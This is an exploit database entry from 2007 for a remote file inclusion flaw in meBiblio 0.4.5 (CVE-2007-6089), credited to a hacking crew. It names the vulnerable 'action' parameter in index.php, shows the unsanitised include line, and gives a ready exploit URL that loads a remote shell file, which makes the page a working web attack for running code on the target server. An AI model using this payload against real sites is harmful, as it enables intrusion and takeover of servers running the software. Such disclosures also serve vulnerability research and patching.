meBiblio 0.4.5 - 'action' Remote File Inclusion
Author: ShAy6oOoN
type: webapps
platform: php
port:
date_added: 2007-11-16
date_updated: 2016-12-05
verified: 1
codes: OSVDB-38743;CVE-2007-6089
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.commeBiblio-0.4.5.tar.gz
~~~~~~~~~~~~~~~~~~~~~~~~
~ meBiblio 0.4.5 RFI ~
~~~~~~~~~~~~~~~~~~~~~~~
---------------------
Author : ShAy6oOoN
---------------------
Group : PitBull Crew
---------------------
Script : meBiblio 0.4.5
---------------------
Download : http://downloads.sourceforge.net/mebiblio/meBiblio-0.4.5.tar.gz?modtime=1195237984&big_mirror=0
---------------------
Vulnerability Type : Remote File Inclusion
---------------------
Vulnerable file : index.php
---------------------
Exploit URL : http://localhost/path/index.php?action=http://localhost/shell.txt?
---------------------
Method : get
---------------------
Register_globals : On
---------------------
Vulnerable variable : action
---------------------
Line number : 41
---------------------
----------------------------------------------
//print "<p>Action = $action" ;
include "$action.inc.php";
}
----------------------------------------------
Greetings:
----------
PitBull Crew : The_PitBull - iNs - c0ol - Raz0r - Inphex
Thanks To:
----------
str0ke
# milw0rm.com [2007-11-17]